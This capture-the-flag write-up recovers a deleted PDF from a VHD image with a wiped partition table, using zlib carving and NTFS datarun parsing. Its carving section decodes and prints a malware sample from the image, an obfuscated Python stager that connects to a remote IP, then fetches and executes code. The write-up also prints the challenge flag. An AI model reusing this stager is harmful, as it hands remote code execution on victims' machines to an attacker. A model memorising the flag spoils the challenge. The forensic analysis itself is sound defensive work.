In this challenge, our objective is to recover a deleted PDF from a drive whose MBR is broken. To achieve this, we parse the transaction history stored in $LogFile to identify the locations of the file's data scattered across the disk.
Description
I was using my Windows virtual machine and had just downloaded what I assumed to be another research paper to add to my ever-growing collection, when suddenly my screen went blank! When I rebooted the VM all of my data was gone… Among the data lost was a crucial file containing a top secret report! Now I’m on the run to recover my lost data…
SHA256(chall.vhd) = fb3141dc4aee5a129e61192c134d32207d4f39b0fa1fb4a19aa156330f53b834
CTF solve
The challenge begins with a disk image called chall.vhd. However, we can’t mount it due to apparent MBR corruption, specifically the absence of a partition table.
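We can confirm this with a quick look at the first sector. The sketch below assumes a classic 512-byte MBR layout (boot signature 0x55AA at offset 510, four 16-byte partition entries starting at 0x1BE); `check_mbr` is a helper name of our own, not a standard API:

```python
def check_mbr(sector: bytes) -> dict:
    """Inspect a 512-byte boot sector: verify the 0x55AA boot signature at
    offset 510 and look at the four 16-byte partition entries at 0x1BE."""
    entries = [sector[0x1BE + 16 * n:0x1BE + 16 * (n + 1)] for n in range(4)]
    return {
        "boot_signature_ok": sector[510:512] == b"\x55\xaa",
        "empty_partition_table": all(e == b"\x00" * 16 for e in entries),
    }

# Hypothetical usage: check_mbr(open("chall.vhd", "rb").read(512))
```

On this image, both checks point at a wiped partition table, which explains why the VHD refuses to mount.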
To recover data, we ingest the image into Autopsy and run file carving on it. This reveals a file named FlagReport.pdf that was downloaded from the internet.
```
[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://downloads3.sejda.com/api/tasks/CJEKB1VP-202209210447/download/Fl.pdf?s=web-KOiaolqn8GEeyjHrXlqnPyTs0UyOAZZT3fP5T&v=true&_s=8
HostUrl=https://downloads3.sejda.com/api/tasks/CJEKB1VP-202209210447/download/Flag.pdf?s=web-KOiaolqn8GEeyjHrXlqnPyTs0UyOAZZT3fP5T&v=true&_s=8
```
Verification through MFT Browser confirms the file’s existence. Unfortunately, the Data Run value for this file is null.
Two other carved files with a .sh extension catch our attention. Decoding their base64 content reveals another layer of encoding:
```shell
$ script="ZXhlYyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnYVcxd2IzSjBJSE52WTJ0bGRDeDZiR2xpTEdKaGMyVTJOQ3h6ZEhKMVkzUXNkR2x0WlFwbWIzSWdlQ0JwYmlCeVlXNW5aU2d4TUNrNkNnbDBjbms2Q2drSmN6MXpiMk5yWlhRdWMyOWphMlYwS0RJc2MyOWphMlYwTGxOUFEwdGZVMVJTUlVGTktRb0pDWE11WTI5dWJtVmpkQ2dvSnpFeU5DNDBNeTR4TXpBdU1UZ3pKeXcwTWpReUtTa0tDUWxpY21WaGF3b0paWGhqWlhCME9nb0pDWFJwYldVdWMyeGxaWEFvTlNrS2JEMXpkSEoxWTNRdWRXNXdZV05yS0NjK1NTY3NjeTV5WldOMktEUXBLVnN3WFFwa1BYTXVjbVZqZGloc0tRcDNhR2xzWlNCc1pXNG9aQ2s4YkRvS0NXUXJQWE11Y21WamRpaHNMV3hsYmloa0tTa0taWGhsWXloNmJHbGlMbVJsWTI5dGNISmxjM01vWW1GelpUWTBMbUkyTkdSbFkyOWtaU2hrS1Nrc2V5ZHpKenB6ZlNrSycpWzBdKSkg"
$ echo "$script" | base64 --decode
```
```
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEyNC40My4xMzAuMTgzJyw0MjQyKSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK')[0]))
```
We discover a Python script capable of executing commands from a remote host.
```shell
$ echo "aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEyNC40My4xMzAuMTgzJyw0MjQyKSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyh6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShkKSkseydzJzpzfSkK" | base64 -d
```
```python
import socket,zlib,base64,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('124.43.130.183',4242))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})
```
A second .sh script mirrors the first, differing only in its IP address and port.
Given that PDF streams use zlib (FlateDecode) compression, our approach is to inflate every zlib stream found in the image in order to retrieve the flag.
```python
import zlib

def inflate(data):
    # Raw DEFLATE decompression: we skip the 2-byte zlib header ourselves,
    # so disable header checking with a negative window size
    decompress = zlib.decompressobj(-zlib.MAX_WBITS)
    inflated = decompress.decompress(data)
    inflated += decompress.flush()
    return inflated

f = open("chall.vhd", "rb").read()
g = open("out.txt", "w")
total_i = 0
while True:
    i = f.find(b"x\x9c")  # zlib magic for default compression level
    if i == -1:
        break
    total_i += i
    print(hex(total_i))
    try:
        s = inflate(f[i + 2:i + 2 + 0x400])
        g.write(f"{total_i:016x}: {s!r}\n")
        g.flush()
    except Exception as e:
        print(e)
    f = f[i + 1:]
    total_i += 1  # account for the byte skipped when truncating f
```
That method gives us the flag:
```
00000000006b2164: b'Q\nBT\n0 Tr\n/DeviceRGB cs\n0.82745 0.18431 0.18431 sc\n/F3 35 Tf\n1 0 0 1 48 79 Tm\n(HTB{C3rTiF13d_C4rv1N9_sk1L1}) Tj\n0 Tr\nET\n'
```
Real world solve
Another, much smarter way of doing the challenge is to delve into the workings of NTFS and the MFT.
Within the MFT, each file is represented by a record containing crucial metadata, such as file names, timestamps, and file attributes. For files with a size below roughly 1024 bytes, the content is stored directly within the MFT entry; this type is referred to as a “resident” entry. If a file is larger, the entry is designated “non-resident”. In such cases, the entry includes references, known as dataruns, pointing to the clusters on the disk where the actual file data is stored. It’s important to note that the file data may be distributed across multiple non-contiguous clusters.
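As an illustration, here is a minimal sketch (a helper of our own, assuming a standard FILE record layout with the first-attribute offset stored at record offset 0x14, and no attribute lists) that walks a raw MFT record and reports whether its $DATA attribute (type 0x80) is resident:

```python
import struct

def data_attr_is_resident(record: bytes):
    """Walk the attributes of a raw MFT FILE record and report whether the
    $DATA attribute (type 0x80) is resident. Returns None if no $DATA
    attribute is found in the record itself."""
    # Offset of the first attribute is stored at record offset 0x14
    attr_off = struct.unpack_from("<H", record, 0x14)[0]
    while attr_off + 8 <= len(record):
        attr_type, attr_len = struct.unpack_from("<II", record, attr_off)
        if attr_type == 0xFFFFFFFF or attr_len == 0:  # end-of-attributes marker
            break
        if attr_type == 0x80:  # $DATA
            # Byte 8 of the attribute header is the non-resident flag
            return record[attr_off + 8] == 0
        attr_off += attr_len
    return None
```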
Concerning the bash script extracted with MFT Browser, a value for the DataRun field is set. The value given is 21012A1D, which decomposes into several parts (see sources).
- The low nibble of the header byte (1) gives the number of following bytes that encode the run length in clusters: 01. {cluster_size} * {run_size}
- The high nibble of the header byte (2) gives the number of bytes, after the length bytes, that encode the run’s starting cluster: 0x1D2A (stored little-endian as 2A 1D). {cluster_size} * {data_block_start} + {beginning_partition_offset}
- beginning_partition_offset = 0x10000 (offset where the NTFS boot sector, carrying the NTFS signature, begins)
- cluster_size = 0x1000 = 4096
- data_block_start = 0x1D2A = 7466
```python
>>> hex(4096 * 7466 + 0x10000)  # data run start offset
'0x1d3a000'
>>> hex(1 * 0x1000)  # size of data run
'0x1000'
```
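The decomposition above can also be scripted; a minimal sketch decoding the single run 21012A1D, under the same cluster-size and partition-offset assumptions:

```python
run = bytes.fromhex("21012A1D")
header = run[0]
size_len = header & 0x0F            # low nibble: 1 byte of run length
offset_len = (header >> 4) & 0x0F   # high nibble: 2 bytes of cluster offset
run_size = int.from_bytes(run[1:1 + size_len], "little")  # 0x01 cluster
run_offset = int.from_bytes(run[1 + size_len:1 + size_len + offset_len],
                            "little", signed=True)        # 0x1D2A
CLUSTER_SIZE = 0x1000
PARTITION_OFFSET = 0x10000
print(hex(run_offset * CLUSTER_SIZE + PARTITION_OFFSET))  # 0x1d3a000
print(hex(run_size * CLUSTER_SIZE))                       # 0x1000
```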
Upon selecting the DataRun field in MFT Browser, the start offset is also given in decimal (excluding the beginning_partition_offset).
$LogFile maintains the transaction history for the $MFT. Parsing this history from the VHD file is achievable using LogFileParser. Filtering on FlagReport.pdf, we can identify the file’s initial dataruns.
Alternatively, manually exploring the drive reveals the same information.
We’ve created a script to retrieve details about the dataruns 222C0588052292010F1600 associated with the file FlagReport.pdf.
```python
import io
import struct


# Stolen from https://github.com/fox-it/dissect.ntfs/blob/main/dissect/ntfs/c_ntfs.py#L614
def varint(buf: bytes) -> int:
    """Parse variable integers.

    Dataruns in NTFS are stored as a tuple of variable sized integers. The size of each
    integer is stored in the first byte, 4 bits for each integer. This function only parses
    those variable amounts of bytes into actual integers. To do that, we simply pad the bytes
    to 8 bytes long and parse them as a signed 64-bit integer. We pad with 0xff if the number
    is negative and 0x00 otherwise.

    Args:
        buf: The byte buffer to parse a varint from.
    """
    if len(buf) < 8:
        buf += (b"\xff" if buf[-1] & 0x80 else b"\x00") * (8 - len(buf))
    return struct.unpack("<q", buf)[0]


# Stolen from https://github.com/fox-it/dissect.ntfs/blob/main/dissect/ntfs/attr.py#L197
def dataruns(raw: bytes) -> list[tuple[int, int]]:
    """Return the (offset, size) pairs encoded in a raw datarun string."""
    fh = io.BytesIO(raw)
    runs = []
    offset = 0
    while True:
        value = fh.read(1)[0]  # Header byte: high nibble = offset length, low nibble = size length
        if value == 0:
            break
        size_len = value & 0xF
        offset_len = (value >> 4) & 0xF
        run_size = varint(fh.read(size_len))
        if offset_len == 0:  # Sparse run
            run_offset = None
        else:
            # Offsets are relative to the previous run's offset
            run_offset = offset = offset + varint(fh.read(offset_len))
        runs.append((run_offset, run_size))
    return runs


def get_offset_file(runs: list, cluster_size: int = 0x1000, starting_offset: int = 0x10000):
    for run_offset, run_size in runs:
        start = run_offset * cluster_size + starting_offset
        size = run_size * cluster_size
        print(f"[+] Data run start offset : {hex(start)}")
        print(f"[+] Data run end offset : {hex(start + size)}")
        print(f"[+] Data run size : {hex(size)}")


runs = dataruns(bytes.fromhex("222C0588052292010F1600"))
get_offset_file(runs)
```
```shell
$ python3 dataruns.py
[+] Data run start offset : 0x598000
[+] Data run end offset : 0xac4000
[+] Data run size : 0x52c000
[+] Data run start offset : 0x1ba7000
[+] Data run end offset : 0x1d39000
[+] Data run size : 0x192000
```
Extracting data from the specified addresses allows the reconstruction of the PDF containing the flag.
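That extraction step can be sketched as follows (`extract_runs` is a helper of our own; the run offsets and sizes come from the dataruns.py output):

```python
def extract_runs(image_path: str, runs, out_path: str) -> int:
    """Concatenate each (absolute offset, size) run read from the disk image
    into out_path; returns the number of bytes written."""
    written = 0
    with open(image_path, "rb") as img, open(out_path, "wb") as out:
        for off, size in runs:
            img.seek(off)
            chunk = img.read(size)
            out.write(chunk)
            written += len(chunk)
    return written

# Offsets and sizes taken from the dataruns.py output
runs = [(0x598000, 0x52C000), (0x1BA7000, 0x192000)]
# extract_runs("chall.vhd", runs, "FlagReport.pdf")
```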
Sources